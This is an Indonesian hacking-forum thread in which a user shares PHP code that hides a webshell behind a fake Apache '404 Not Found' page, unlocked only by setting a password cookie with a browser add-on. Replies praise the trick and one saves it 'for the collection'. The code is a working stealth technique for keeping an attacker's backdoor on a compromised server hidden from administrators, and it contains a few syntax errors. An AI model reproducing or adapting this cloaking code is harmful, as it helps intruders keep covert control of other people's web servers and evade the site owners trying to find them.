Shell 404 Not Found With Cookie Authentication

**dharaninja** · 09-20-2015, 08:48 PM

Numpang share ya bro :v Saya perhatikan kalau webshell berpassword yang umum, biasanya tampilannya 404 not found tapi kalau diraba2 gitu ada colom buat ngisi password :v Kalau seandainya adminnya liat view Confused

ource keliatan deh kolomnya :v

Tapi, disini authentikasinya saya robah lagi jadi pake cookie bro. Ini screenshootnya
[Image: Screenshot_from_2015_09_20_19_32_51.png]

[Image: Screenshot_from_2015_09_20_19_32_51.png]

Oke, dari hasil diatas kalau di view source gak ada column tuh :v Untuk masukin passwordnya kita perlu add on yang namanya cookies manager

[Image: Screenshot_from_2015_09_20_19_39_53.png]

[Image: Screenshot_from_2015_09_20_19_39_53.png]

Setelah itu save baru muncul webshellnya :v

[Image: Screenshot_from_2015_09_20_19_42_44.png]

Dan ini kode PHP nya, ditaruh dicode shell yang atas aja bro

PHP Code:
$s_show = ""; md5(password)

if(!isset($_COOKIE['show'])) {
setcookie("show","null",time() 3600);
}

if(kript($_COOKIE['show']) == $s_show) {
setcookie("show",md5($_SERVER['HTTP_USER_AGENT'].md5($_COOKIE['show']).$_SERVER['SCRIPT_NAME']),time() + 3600);
} else {
if($_COOKIE['show'] != md5($_SERVER['HTTP_USER_AGENT'].$s_show.$_SERVER['SCRIPT_NAME'])) {
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL <?php echo $_SERVER['SCRIPT_NAME'];?> was not found on this server.</p> <hr> <address><?php echo $_SERVER['SERVER_SOFTWARE'];?> Server at <?php echo $_SERVER['HTTP_HOST']; ?> Port <?php echo $_SERVER['SERVER_PORT'];?></address> </body></html>
<?php
exit;
}} 

Mungkin buat agan2 yang udah bisa pemrograman PHP ini mungkin sudah biasa, tapi gak ada salahnya kalau ane share :v Jangan lupa cendol ya bro :v

**EKO_X** · 09-21-2015, 06:00 PM

buat google chrome ga ada bro Big Grin

**dharaninja** · 09-21-2015, 07:47 PM

(09-21-2015, 06:00 PM)EKO_X Wrote: buat google chrome ga ada bro

Buat google chrome bisa juga bro Big Grin

Kan cookies manager support di google chrome juga Big Grin

**koecroet** · 09-22-2015, 12:26 AM

wih insert passwordnya dari set cookie ya ? keren nih. izin tambah koleksi om

**antonl** · 09-24-2015, 09:22 PM

kalo ga salah itu dulu pernah coba, cara masukinnya pake tab :3

**dharaninja** · 09-24-2015, 09:45 PM

(09-24-2015, 09:22 PM)antonl Wrote: kalo ga salah itu dulu pernah coba, cara masukinnya pake tab :3

Sok aja kalau bisa pake tab :v Kan itu form passwordnya di cookies, yang pake tab taktik jadul itu :p

**antonl** · 09-24-2015, 09:51 PM

(09-24-2015, 09:45 PM)dharaninja Wrote:
(09-24-2015, 09:22 PM)antonl Wrote: kalo ga salah itu dulu pernah coba, cara masukinnya pake tab :3

Sok aja kalau bisa pake tab :v Kan itu form passwordnya di cookies, yang pake tab taktik jadul itu :p

kan dulu om, brarti udah diganti :v

**iPin** · 09-25-2015, 10:59 AM

widihh nice share om Smile

) ++ dari ane